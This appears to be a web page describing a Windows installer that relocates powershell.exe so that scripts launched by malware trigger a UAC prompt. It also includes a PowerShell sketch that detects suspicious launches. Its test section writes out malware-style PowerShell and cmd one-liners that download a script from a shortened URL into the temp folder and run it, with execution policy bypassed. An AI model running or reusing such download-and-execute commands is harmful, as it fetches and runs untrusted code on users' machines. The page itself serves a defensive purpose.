It's a simple way to monitor invocation of scripts from rogue/hack attempts that use the default powershell.exe command to launch scripts. Clever and recent PowerShell malware downloads its own builds of powershell.exe.
The following malware example, from Trend Micro's "Security 101: The Rise of Fileless Threats that Abuse PowerShell", will not work once this is installed; it will force the UAC pop-up.
[Image: A code snapshot of macro malware that uses “^” for command shell obfuscation. (Using this script will force the UAC pop-up.)]
(New-Object System.Net.WebClient).DownloadFile('https://bit.ly/Readkeyps1',"$env:temp\Readkey.ps1"); & "$env:temp\Readkey.ps1" -u
It will run and wait for a key to be pressed. https://bit.ly/Readkeyps1 downloads Readkey.ps1.
Or paste this command into Windows Start->Run (simulating use by malware):
cmd.exe /c powershell.exe -executionpolicy bypass -command "(New-Object System.Net.WebClient).DownloadFile('http://bit.ly/Readkeyps1',\"$env:temp\Readkey.ps1\"); & \"$env:temp\Readkey.ps1\" -u"
-WindowStyle Hidden is removed because it would hide the PowerShell window that waits for the key press.
After installing this script, you'll get a UAC pop-up (see image below).
Also, running a script from the CMD line will not work, because the ".\" (current directory) will not be passed correctly. For example, powershell .\Readkey.ps1
will fail from any directory other than C:\windows and 2 directories below.
The Privilege Level setting is not otherwise accessible via the Properties window in these default Windows 10+ directories:
- x64 DIRECTORY - C:\Windows\System32\WindowsPowerShell\v1.0\
- x32 DIRECTORY - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\
[Image: In Windows 10, the Compatibility tab is not available]
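The monitoring idea discussed above, as an added PowerShell example (not part of the original post or of the utility): it checks process-creation records for the patterns this page mentions, namely "^" obfuscation, -executionpolicy bypass, a WebClient download, and a powershell.exe outside the two default directories. The function name, finding labels and sample records are constructed for illustration.

```powershell
# Added example. The sample records below are constructed, not real telemetry.
$DefaultDirs = @(
    'C:\Windows\System32\WindowsPowerShell\v1.0\',
    'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\'
    # Add 'C:\Windows\' when the utility described on this page is installed.
)

function Test-PowerShellLaunch {   # hypothetical helper name
    param(
        [Parameter(Mandatory)][string]$Image,       # full path of the started process
        [Parameter(Mandatory)][string]$CommandLine  # command line as logged
    )
    # cmd.exe treats "^" as an escape character, so strip carets before matching.
    # -match is case-insensitive by default.
    $normalized = $CommandLine -replace '\^', ''
    $findings = @()

    if ($normalized -ne $CommandLine -and $normalized -match 'powershell') {
        $findings += 'caret-obfuscation'
    }
    # Heuristic: -ExecutionPolicy may be abbreviated (-ex, -exec, -ep, ...).
    if ($normalized -match '-(ep|ex[a-z]*)\s+bypass') {
        $findings += 'execution-policy-bypass'
    }
    if ($normalized -match 'Net\.WebClient' -and $normalized -match 'Download(File|String)') {
        $findings += 'download-and-run'
    }
    # A powershell.exe outside the default directories may be a separately supplied build.
    if ($Image -match '\\powershell\.exe$') {
        $dir = $Image -replace '[^\\]+$', ''        # keep the directory, with trailing "\"
        if ($DefaultDirs -notcontains $dir) { $findings += 'non-default-image-path' }
    }
    [pscustomobject]@{ Image = $Image; Findings = ($findings -join ', ') }
}

$samples = @(
    @{ Image = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'cmd.exe /c powershell.exe -executionpolicy bypass -command "(New-Object System.Net.WebClient).DownloadFile(''http://example.invalid/a.ps1'',''a.ps1'')"' },
    @{ Image = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'cmd.exe /c p^ow^er^shell -ex bypass -file a.ps1' },
    @{ Image = 'C:\Users\Public\powershell.exe'
       CommandLine = 'powershell.exe -File report.ps1' },
    @{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'powershell.exe -NoProfile -File C:\Scripts\backup.ps1' }
)
foreach ($s in $samples) { Test-PowerShellLaunch @s } | Format-Table -AutoSize -Wrap
```

The last sample is a routine launch from the default directory and comes back with no findings; the other three each trip at least one check.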
This utility has the following features:
This .inf installer copies powershell.exe from its current default location to C:\Windows\Powershell.exe, which becomes the new default Windows powershell.exe that will be run.
Does not install any software; it just sets some registry settings to enable this. Additionally, it provides a proper uninstall option.
Bonus:
- Works in Windows 10+ (and equivalent Server versions).
- Comes with a proper uninstaller located in "Add or Remove Programs" or Programs and Features
↓ PowershellexeRunAsAdminWin10BatFile.zip
Install 64-bits Only
Prerequisite: Your user account must be part of the Administrators group, or you must know the Administrator password to install.
1. Tip! Back up your registry as a precaution.
2. Download and unzip the file ↓PowershellexeRunAsAdminWin10BatFile.zip
3. Simply right-click on PowershellexeRunAsAdminWin10.bat and choose Run as administrator; that's it.
Uninstall
The great thing about this script file is that it creates an uninstall option.
Search for "Add or Remove Programs" or go to Programs and Features, right-click on "Powershell.exe Run as Admin Win 10 (Uninstall only)" and choose Uninstall to completely remove it.
Windows Major Updates
You may have to reinstall this to run any updates to the PowerShell platform.